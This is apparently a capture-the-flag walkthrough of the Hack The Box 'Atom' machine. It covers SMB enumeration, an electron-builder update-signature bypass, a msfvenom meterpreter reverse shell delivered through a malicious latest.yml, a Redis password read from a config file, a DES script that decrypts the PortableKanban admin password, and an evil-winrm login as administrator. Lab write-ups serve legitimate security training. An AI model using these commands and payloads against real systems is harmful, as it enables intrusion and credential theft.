IP: 10.10.10.237 System: windows
referense to atom editor ? Lets start by focus on things that have something to do with programming / software.
add the ip to hosts.
echo "10.10.10.237 atom.htb" >> /etc/hosts
Nmap scan
|port|service| |—|—| |80|http| |135|msrpc| |443|https| |445|SMB| |5985|http| |6379|redis| |7680|pando-pub?|
On the http/https is the same page, which allows you to download a program for windows.
lets try SMB port #smbclient
smbclient atom.htb
This will display interresting shares, lets start with software_updates there might be something there
smbclient atom.htb\Software_updates
smbclient -N "\\\\atom.htb\Software_Updates"
get download the pdf, no need to look at the other folder as they are empty.
Look to be a user acception test document.
get UAT_Testing_procesudres.pdf
What we learn from the document is that the application is built on “electron-builder”
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
From the blog posts we learn that the signature verfication process in electron-builder is string comparison between the install binary publisherName and cerf common name.
let try out exploit first with msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.200 LPORT=8765 -f exe -o "trustme.exe"
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set Lhost 10.10.14.200
set lport 8765
Create you yml file
version: 1.2.3
path: http://10.10.14.200/trustme.exe
sha512: <hash>
python3 -m http.server
login back into the smb and put in the latest.yml file inside one of the clients.
cd client1
put latest.yml
lets wait and see if anything happens.
and we got shell.
more c:\users\jason\desktop\user.txt
admin
I always wanted to try something like WINPEAs and see if it works.
upload the file using meterpreter
winPEASx64.exe servicesinfo
from the winPEAS we learn about a service called redis Going to the redis folder we see a conf file
cd c:\program files\Redis
type redis.windows.service.conf
#output
requirepass kidvscat_yes_kidvscat
install redis-cli is you do not have it.
apt intall redis-tools
redis-cli -h atom.htb -a <password>
keys *
get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin","Inactive":false,"TimeStamp":637530169606440253}”
And we got the hash -> Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi Now the question is how do we get the password?
while using the winpeasx64 I saw the jason having Portable kanban inside his downloable folder, lets see if they use the same password for that as his admin account. Portable-kanban stores password as encryption format des and the same key is used for every product.
google Portable kanban encrypted password and you get a python script for how to decrypt the hash. but it uses the pk3 file as argument but as we allready have the hash lets just that instead, and just alway everything we do not need.
import base64
from des import * #python3 -m pip install des
try:
hash = base64.b64decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi")
key = DesKey(b"7ly6UznJ")
print("Decrypted Password : " + key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8'))
except:
print("Wrong Hash")
And we got the admin password. Decrypted Password : kidvscat_admin_@123
lets use the windows remote management to get access as admin on the machine, it a SOAP based protocol that allows hardware and operation systems from diffrent vendors to interoperate. here a nice tool to get access to it. https://github.com/Hackplayers/evil-winrm
sudo gem install evil-winrm
evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'
And we got root access.